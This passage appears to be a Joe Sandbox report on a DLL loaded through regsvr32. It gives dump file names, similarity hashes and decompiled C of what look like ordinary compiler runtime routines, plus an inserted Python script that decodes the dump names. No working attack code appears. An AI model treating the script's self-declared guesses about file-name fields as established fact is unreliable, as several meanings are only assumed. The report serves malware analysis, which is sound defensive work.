• Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Value$ErrorLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 2506987500-0
                                                                                                  • Opcode ID: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                  • Instruction ID: b3640c739d53f521f3aff5ec24f9b4829142f54ff52cb57a8f227eaee239dcc8
                                                                                                  • Opcode Fuzzy Hash: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                  • Instruction Fuzzy Hash: 72115C3070964942FAEBE32195453F972926B9C7F0F18C625B83A077DBDE68C6498701
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LoadMessage$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterWindow
                                                                                                  • String ID:
                                                                                                  • API String ID: 1967609040-0
                                                                                                  • Opcode ID: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                  • Instruction ID: 677205889e0bc738131920ca4d71d6e0d0c6d5bcb4ac294ec7d30bf60c9b59c6
                                                                                                  • Opcode Fuzzy Hash: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                  • Instruction Fuzzy Hash: 8611B932614E89D2E7A2DB61F8517DA7361F7D8784F508121FA8947A79DF3CC7198B00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 63%
                                                                                                  			E00000001180003B5C(void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                                                                  				signed int _v32;
                                                                                                  				long long _v40;
                                                                                                  				char _v48;
                                                                                                  				signed int* _v56;
                                                                                                  				void* _t55;
                                                                                                  				intOrPtr _t60;
                                                                                                  				signed int _t101;
                                                                                                  				void* _t109;
                                                                                                  				intOrPtr _t111;
                                                                                                  				signed int* _t115;
                                                                                                  				intOrPtr* _t136;
                                                                                                  				void* _t139;
                                                                                                  				void* _t142;
                                                                                                  				void* _t144;
                                                                                                  				void* _t158;
                                                                                                  				void* _t159;
                                                                                                  
                                                                                                  				_t109 = _t144;
                                                                                                  				 *((long long*)(_t109 + 8)) = __rbx;
                                                                                                  				 *((long long*)(_t109 + 0x10)) = __rbp;
                                                                                                  				 *((long long*)(_t109 + 0x18)) = __rsi;
                                                                                                  				 *((long long*)(_t109 + 0x20)) = __rdi;
                                                                                                  				_t136 = __rcx;
                                                                                                  				_t139 = __r9;
                                                                                                  				_t159 = __r8;
                                                                                                  				_t142 = __rdx;
                                                                                                  				E00000001180004584(_t55, __r8);
                                                                                                  				E00000001180002D40(_t109);
                                                                                                  				_t115 = _a40;
                                                                                                  				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80003bde;
                                                                                                  				if ( *__rcx == 0xe06d7363) goto 0x80003bde;
                                                                                                  				if ( *__rcx != 0x80000029) goto 0x80003bc2;
                                                                                                  				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80003bc6;
                                                                                                  				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80003bde;
                                                                                                  				if ( *__rcx == 0x80000026) goto 0x80003bde;
                                                                                                  				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003bde;
                                                                                                  				if ((_t115[9] & 0x00000001) != 0) goto 0x80003d6d;
                                                                                                  				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80003c76;
                                                                                                  				if (_t115[1] == 0) goto 0x80003d6d;
                                                                                                  				if (_a48 != 0) goto 0x80003d6d;
                                                                                                  				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80003c63;
                                                                                                  				if ( *__rcx != 0x80000026) goto 0x80003c41;
                                                                                                  				_t60 = E00000001180002F2C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
                                                                                                  				if (_t60 - 0xffffffff < 0) goto 0x80003d8d;
                                                                                                  				if (_t60 - _t115[1] >= 0) goto 0x80003d8d;
                                                                                                  				r9d = _t60;
                                                                                                  				E000000011800040F0(_t109, _t142, __r9, _t115);
                                                                                                  				goto 0x80003d6d;
                                                                                                  				if ( *_t136 != 0x80000029) goto 0x80003c63;
                                                                                                  				r9d =  *((intOrPtr*)(_t136 + 0x38));
                                                                                                  				if (r9d - 0xffffffff < 0) goto 0x80003d8d;
                                                                                                  				if (r9d - _t115[1] >= 0) goto 0x80003d8d;
                                                                                                  				goto 0x80003c31;
                                                                                                  				E00000001180002004(r9d - _t115[1], _t109, _t115, __r9, __r9, _t115);
                                                                                                  				goto 0x80003d6d;
                                                                                                  				if (_t115[3] != 0) goto 0x80003cbe;
                                                                                                  				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003c9e;
                                                                                                  				_t101 = _t115[8];
                                                                                                  				if (_t101 == 0) goto 0x80003c9e;
                                                                                                  				E00000001180002408(_t109);
                                                                                                  				if (_t101 != 0) goto 0x80003cbe;
                                                                                                  				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003d6d;
                                                                                                  				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003d6d;
                                                                                                  				if ( *_t136 != 0xe06d7363) goto 0x80003d34;
                                                                                                  				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x80003d34;
                                                                                                  				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x80003d34;
                                                                                                  				_t111 =  *((intOrPtr*)(_t136 + 0x30));
                                                                                                  				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x80003d34;
                                                                                                  				E0000000118000241C(_t111);
                                                                                                  				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x80003d34;
                                                                                                  				_v32 = _a64 & 0x000000ff;
                                                                                                  				_v40 = _a56;
                                                                                                  				_v48 = _a48;
                                                                                                  				_v56 = _t115;
                                                                                                  				 *0x80016370(_t158);
                                                                                                  				goto 0x80003d72;
                                                                                                  				_v32 = _a56;
                                                                                                  				_v40 = _a48;
                                                                                                  				_v48 = _a64;
                                                                                                  				_v56 = _t115;
                                                                                                  				E00000001180003328(_a64 & 0x000000ff, 0x80000026, __esi, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
                                                                                                  				return 1;
                                                                                                  			}
                                                                                                  0x180003b5c
                                                                                                  0x180003b5f
                                                                                                  0x180003b63
                                                                                                  0x180003b67
                                                                                                  0x180003b6b
                                                                                                  0x180003b75
                                                                                                  0x180003b78
                                                                                                  0x180003b7e
                                                                                                  0x180003b81
                                                                                                  0x180003b84
                                                                                                  0x180003b89
                                                                                                  0x180003b8e
                                                                                                  0x180003ba4
                                                                                                  0x180003bac
                                                                                                  0x180003bb0
                                                                                                  0x180003bb6
                                                                                                  0x180003bc0
                                                                                                  0x180003bc4
                                                                                                  0x180003bd2
                                                                                                  0x180003bd8
                                                                                                  0x180003be2
                                                                                                  0x180003bec
                                                                                                  0x180003bfa
                                                                                                  0x180003c04
                                                                                                  0x180003c08
                                                                                                  0x180003c14
                                                                                                  0x180003c1c
                                                                                                  0x180003c25
                                                                                                  0x180003c2b
                                                                                                  0x180003c37
                                                                                                  0x180003c3c
                                                                                                  0x180003c43
                                                                                                  0x180003c45
                                                                                                  0x180003c4d
                                                                                                  0x180003c57
                                                                                                  0x180003c61
                                                                                                  0x180003c6c
                                                                                                  0x180003c71
                                                                                                  0x180003c7a
                                                                                                  0x180003c88
                                                                                                  0x180003c8a
                                                                                                  0x180003c8e
                                                                                                  0x180003c90
                                                                                                  0x180003c9c
                                                                                                  0x180003caa
                                                                                                  0x180003cb8
                                                                                                  0x180003cc4
                                                                                                  0x180003cca
                                                                                                  0x180003cd3
                                                                                                  0x180003cd5
                                                                                                  0x180003cdd
                                                                                                  0x180003cdf
                                                                                                  0x180003cf2
                                                                                                  0x180003d09
                                                                                                  0x180003d18
                                                                                                  0x180003d20
                                                                                                  0x180003d27
                                                                                                  0x180003d2c
                                                                                                  0x180003d32
                                                                                                  0x180003d3f
                                                                                                  0x180003d51
                                                                                                  0x180003d5f
                                                                                                  0x180003d63
                                                                                                  0x180003d68
                                                                                                  0x180003d8c

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                  • String ID: csm$csm
                                                                                                  • API String ID: 851805269-3733052814
                                                                                                  • Opcode ID: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                  • Instruction ID: ef6ae88387dfa06c815bde898961dd69fb07e80911919095ce8a45e838d8869a
                                                                                                  • Opcode Fuzzy Hash: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                  • Instruction Fuzzy Hash: C5617F3220078886EBB6CF26E44539877A9F758BD4F18C116EB9847BD5CF38D699C701
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 30%
                                                                                                  			E00000001180002A84(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
                                                                                                  				void* _t76;
                                                                                                  				void* _t83;
                                                                                                  				void* _t84;
                                                                                                  				intOrPtr _t101;
                                                                                                  				intOrPtr _t103;
                                                                                                  				void* _t113;
                                                                                                  				void* _t118;
                                                                                                  				void* _t130;
                                                                                                  				long long _t133;
                                                                                                  				intOrPtr* _t135;
                                                                                                  				signed long long _t144;
                                                                                                  				void* _t150;
                                                                                                  				signed long long _t154;
                                                                                                  				void* _t156;
                                                                                                  				long long _t158;
                                                                                                  				intOrPtr* _t159;
                                                                                                  				void* _t161;
                                                                                                  				void* _t162;
                                                                                                  				signed long long _t166;
                                                                                                  				void* _t170;
                                                                                                  				intOrPtr _t171;
                                                                                                  				void* _t173;
                                                                                                  				void* _t174;
                                                                                                  				void* _t176;
                                                                                                  				void* _t178;
                                                                                                  				void* _t180;
                                                                                                  				intOrPtr* _t181;
                                                                                                  
                                                                                                  				_t130 = __rax;
                                                                                                  				 *((long long*)(_t161 + 8)) = __rbx;
                                                                                                  				 *((long long*)(_t161 + 0x10)) = _t158;
                                                                                                  				 *((long long*)(_t161 + 0x18)) = __rsi;
                                                                                                  				_t162 = _t161 - 0x40;
                                                                                                  				_t159 = __rcx;
                                                                                                  				_t181 = __r9;
                                                                                                  				_t174 = __rdx;
                                                                                                  				E00000001180004584(_t76, __r8);
                                                                                                  				_t171 =  *((intOrPtr*)(__r9 + 8));
                                                                                                  				_t135 =  *((intOrPtr*)(__r9 + 0x38));
                                                                                                  				_t178 =  *__r9 - _t171;
                                                                                                  				_t103 =  *((intOrPtr*)(__r9 + 0x48));
                                                                                                  				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x80002bac;
                                                                                                  				 *((long long*)(_t162 + 0x30)) = __rcx;
                                                                                                  				 *((long long*)(_t162 + 0x38)) = __r8;
                                                                                                  				if (_t103 -  *_t135 >= 0) goto 0x80002c58;
                                                                                                  				_t154 = __r8 + __r8;
                                                                                                  				if (_t178 - _t130 < 0) goto 0x80002b9e;
                                                                                                  				if (_t178 - _t130 >= 0) goto 0x80002b9e;
                                                                                                  				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x80002b9e;
                                                                                                  				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x80002b2a;
                                                                                                  				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
                                                                                                  				if (_t113 < 0) goto 0x80002ba5;
                                                                                                  				if (_t113 <= 0) goto 0x80002b9e;
                                                                                                  				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x80002b5b;
                                                                                                  				if ( *0x800164f8 == 0) goto 0x80002b5b;
                                                                                                  				if (E0000000118000F7F0(_t130 + _t171, _t135, 0x800164f8) == 0) goto 0x80002b5b;
                                                                                                  				_t83 =  *0x800164f8();
                                                                                                  				r8d = 1;
                                                                                                  				_t84 = E00000001180004550(_t83, _t159 + _t171, _t174);
                                                                                                  				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
                                                                                                  				r9d =  *_t159;
                                                                                                  				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
                                                                                                  				_t133 =  *((intOrPtr*)(_t181 + 0x28));
                                                                                                  				 *((long long*)(_t162 + 0x20)) = _t133;
                                                                                                  				__imp__RtlUnwindEx();
                                                                                                  				E00000001180004580(_t84);
                                                                                                  				goto 0x80002ada;
                                                                                                  				goto 0x80002c5d;
                                                                                                  				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
                                                                                                  				goto 0x80002c4e;
                                                                                                  				_t144 = _t174 + _t174;
                                                                                                  				if (_t178 - _t133 < 0) goto 0x80002c4c;
                                                                                                  				_t118 = _t178 - _t133;
                                                                                                  				if (_t118 >= 0) goto 0x80002c4c;
                                                                                                  				r10d =  *(_t159 + 4);
                                                                                                  				r10d = r10d & 0x00000020;
                                                                                                  				if (_t118 == 0) goto 0x80002c21;
                                                                                                  				r9d = 0;
                                                                                                  				if (_t101 == 0) goto 0x80002c1c;
                                                                                                  				r8d = r9d;
                                                                                                  				_t166 = _t159 + _t159;
                                                                                                  				if (_t156 - _t133 < 0) goto 0x80002c14;
                                                                                                  				if (_t156 - _t133 >= 0) goto 0x80002c14;
                                                                                                  				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x80002c14;
                                                                                                  				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x80002c1c;
                                                                                                  				r9d = r9d + 1;
                                                                                                  				if (r9d - _t101 < 0) goto 0x80002be4;
                                                                                                  				if (r9d != _t101) goto 0x80002c58;
                                                                                                  				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x80002c35;
                                                                                                  				if (_t156 != _t133) goto 0x80002c4c;
                                                                                                  				if (r10d != 0) goto 0x80002c58;
                                                                                                  				goto 0x80002c4c;
                                                                                                  				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
                                                                                                  				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
                                                                                                  				 *((long long*)(_t166 + _t171))();
                                                                                                  				if (_t103 + 2 -  *_t135 < 0) goto 0x80002bb8;
                                                                                                  				return 1;
                                                                                                  			}

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                  • String ID: csm$f
                                                                                                  • API String ID: 2395640692-629598281
                                                                                                  • Opcode ID: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                  • Instruction ID: 7da8602e18cf7747c8af8830ce248ccf40cfdad7849785c1bee6e388392e864c
                                                                                                  • Opcode Fuzzy Hash: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                  • Instruction Fuzzy Hash: D551BD32601A588AEBAADF15E844B9D37A5F348BC8F51C121FE1A47789DF74DA89C700
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%
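The five .sdmp names listed under Memory Dump Source above encode, per dump, the region's base address and its page protection, which is what tells a reader that the 0x180001000 dump is the executable code of the regsvr32-loaded module while the other four are read-only or read-write data. The decoder below is an added example for this page and is not Joe Sandbox code; the .sdmp naming scheme is not documented on the page, so the process-index, stage and dump-id fields are parsed on the assumption (supported by the snapshot name hcaresult_3_2_180000000_regsvr32.jbxd) that they are small decimal counters, two fields are left undecoded, and only the protection and type fields are decoded with the winnt.h PAGE_* / MEM_IMAGE constants, whose values are certain. The sample input is the page's own five names.

```python
"""Decode Joe Sandbox memory-dump (.sdmp) file names from a "Memory Dump
Source" block.

Added example for this report page; not Joe Sandbox code. Fields marked
ASSUMED are inferred from the names on the page; the protection and type
fields are decoded with the winnt.h constants, which are certain.
"""
import re

# winnt.h page-protection values (only the low byte carries the PAGE_* value).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTE_MASK = 0xF0  # any of the four PAGE_EXECUTE* bits
MEM_TYPES = {0x01000000: "MEM_IMAGE", 0x00040000: "MEM_MAPPED", 0x00020000: "MEM_PRIVATE"}

# Eight dot-separated fields, as seen on this page.
_SDMP_RE = re.compile(
    r"^(?P<proc>\d{8})\.(?P<stage>\d{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9a-fA-F]{16})\.(?P<protect>[0-9a-fA-F]{8})\."
    r"(?P<field6>[0-9a-fA-F]{8})\.(?P<mtype>[0-9a-fA-F]{8})\."
    r"(?P<field8>[0-9a-fA-F]{8})\.sdmp$"
)


def parse_sdmp_name(name):
    """Split one .sdmp file name into decoded fields; raises ValueError when
    the name does not follow the eight-field layout used on this page."""
    m = _SDMP_RE.match(name.strip())
    if m is None:
        raise ValueError("not an sdmp name in the expected layout: %r" % name)
    protect = int(m["protect"], 16)
    mtype = int(m["mtype"], 16)
    return {
        "process_index": int(m["proc"]),   # ASSUMED: the report's process number
        "stage": int(m["stage"]),          # ASSUMED: analysis phase counter
        "dump_id": int(m["dump_id"]),      # ASSUMED: per-dump sequence number
        "base": int(m["base"], 16),        # region base address
        "protect": protect,
        "protect_name": PAGE_PROTECT.get(protect & 0xFF, "PAGE_0x%02x" % (protect & 0xFF)),
        "executable": bool(protect & EXECUTE_MASK),
        "mem_type": MEM_TYPES.get(mtype, "0x%08x" % mtype),
        "field6": m["field6"],             # undecoded: meaning not given on the page
        "field8": m["field8"],             # undecoded: meaning not given on the page
    }


def executable_regions(names, image_base):
    """Return (base, rva, protect_name) for each dump that maps executable
    memory, with the RVA taken relative to the report's "Offset" value."""
    out = []
    for name in names:
        info = parse_sdmp_name(name)
        if info["executable"]:
            out.append((info["base"], info["base"] - image_base, info["protect_name"]))
    return out


# Constructed sample input: the five names from this page's Memory Dump Source block.
PAGE_DUMPS = [
    "00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp",
    "00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp",
    "00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp",
    "00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp",
    "00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp",
]
IMAGE_BASE = 0x180000000  # "Offset: 0000000180000000" in the report

if __name__ == "__main__":
    for n in PAGE_DUMPS:
        i = parse_sdmp_name(n)
        print("%016x %-22s %s" % (i["base"], i["protect_name"], i["mem_type"]))
    print([(hex(b), hex(r), p) for b, r, p in executable_regions(PAGE_DUMPS, IMAGE_BASE)])
```

Running it over the page's names yields one executable region, base 0x180001000 at RVA 0x1000 with PAGE_EXECUTE_READ, which is where the decompiled functions in this section live; the 0x180021000 dump is the only PAGE_READWRITE region and the remaining three are PAGE_READONLY, all of type MEM_IMAGE, consistent with "based on PE: true".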

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                  • Instruction ID: 6c3fae355f4def66f2243ece08b04bf3b1533bf3e7ed4235295a513a2b2c2168
                                                                                                  • Opcode Fuzzy Hash: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                  • Instruction Fuzzy Hash: 62F06D75714E0891FB92CB24E8443EA6371EB8DBE1F588215FA6A462F6CF2CC24CC300
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 85%
                                                                                                  			E000000011800077FC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                                  				signed int _t27;
                                                                                                  				signed int _t28;
                                                                                                  				signed int _t29;
                                                                                                  				signed int _t30;
                                                                                                  				signed int _t31;
                                                                                                  				signed int _t42;
                                                                                                  				signed int _t43;
                                                                                                  				signed int _t44;
                                                                                                  				signed int _t46;
                                                                                                  				void* _t51;
                                                                                                  
                                                                                                  				_a8 = __rbx;
                                                                                                  				_a16 = __rsi;
                                                                                                  				_t27 = __ecx & 0x0000001f;
                                                                                                  				if ((__ecx & 0x00000008) == 0) goto 0x8000782e;
                                                                                                  				if (sil >= 0) goto 0x8000782e;
                                                                                                  				E0000000118000BC4C(_t27, _t51);
                                                                                                  				_t28 = _t27 & 0xfffffff7;
                                                                                                  				goto 0x80007885;
                                                                                                  				_t42 = 0x00000004 & dil;
                                                                                                  				if (_t42 == 0) goto 0x80007849;
                                                                                                  				asm("dec eax");
                                                                                                  				if (_t42 >= 0) goto 0x80007849;
                                                                                                  				E0000000118000BC4C(_t28, _t51);
                                                                                                  				_t29 = _t28 & 0xfffffffb;
                                                                                                  				goto 0x80007885;
                                                                                                  				_t43 = dil & 0x00000001;
                                                                                                  				if (_t43 == 0) goto 0x80007865;
                                                                                                  				asm("dec eax");
                                                                                                  				if (_t43 >= 0) goto 0x80007865;
                                                                                                  				E0000000118000BC4C(_t29, _t51);
                                                                                                  				_t30 = _t29 & 0xfffffffe;
                                                                                                  				goto 0x80007885;
                                                                                                  				_t44 = dil & 0x00000002;
                                                                                                  				if (_t44 == 0) goto 0x80007885;
                                                                                                  				asm("dec eax");
                                                                                                  				if (_t44 >= 0) goto 0x80007885;
                                                                                                  				if ((dil & 0x00000010) == 0) goto 0x80007882;
                                                                                                  				E0000000118000BC4C(_t30, _t51);
                                                                                                  				_t31 = _t30 & 0xfffffffd;
                                                                                                  				_t46 = dil & 0x00000010;
                                                                                                  				if (_t46 == 0) goto 0x8000789f;
                                                                                                  				asm("dec eax");
                                                                                                  				if (_t46 >= 0) goto 0x8000789f;
                                                                                                  				E0000000118000BC4C(_t31, _t51);
                                                                                                  				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                                                  			}

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.385398518.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.385391498.0000000180000000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385413006.0000000180016000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385422599.0000000180021000.00000004.00000001.01000000.00000008.sdmp
                                                                                                  • Associated: 00000003.00000002.385427672.0000000180023000.00000002.00000001.01000000.00000008.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _set_statfp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1156100317-0
                                                                                                  • Opcode ID: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                  • Instruction ID: 766be9376166aa195c434f29f3971196c8b67f74f947fd55b9f7e9fcb960d4ba
                                                                                                  • Opcode Fuzzy Hash: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                  • Instruction Fuzzy Hash: 3D117736F90A0941F7EE9128D45A3E63141AB6C3F4F59C624B66E462E7CF2C4B59C305
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
                                                                                                  • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
                                                                                                  • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
                                                                                                  • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
                                                                                                  • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080
                                                                                                  Similarity
                                                                                                  • API ID: Value
                                                                                                  • String ID:
                                                                                                  • API String ID: 3702945584-0
                                                                                                  • Opcode ID: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                  • Instruction ID: be0361fe5fc774fdb93e2323036551c88fb1abd5f2001d1ea80391924f68e359
                                                                                                  • Opcode Fuzzy Hash: af6c01d4090da002bcf5badd4e251df8289266538696eb3987054211fa53e7a9
                                                                                                  • Instruction Fuzzy Hash: 80115B7070924881FADBD32569553E932927F8C7F0F18C324B8B9067DADE69C64D5701
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Similarity
                                                                                                  • API ID: Value
                                                                                                  • String ID:
                                                                                                  • API String ID: 3702945584-0
                                                                                                  • Opcode ID: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                  • Instruction ID: 1e63756919ea820504c2c280bc0c9b8fbb4cbfe5ca1be2f3c00cf3ab00ed04ff
                                                                                                  • Opcode Fuzzy Hash: 76d43fe1cfe6227db90b925fa931167f251cb93e2f14ae53a5f4ee5aa2bf7010
                                                                                                  • Instruction Fuzzy Hash: F111397070624D41FAEBE22594527F932826B6D3F0F58CB24B93A0A2C7DE2C9A4D4310
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

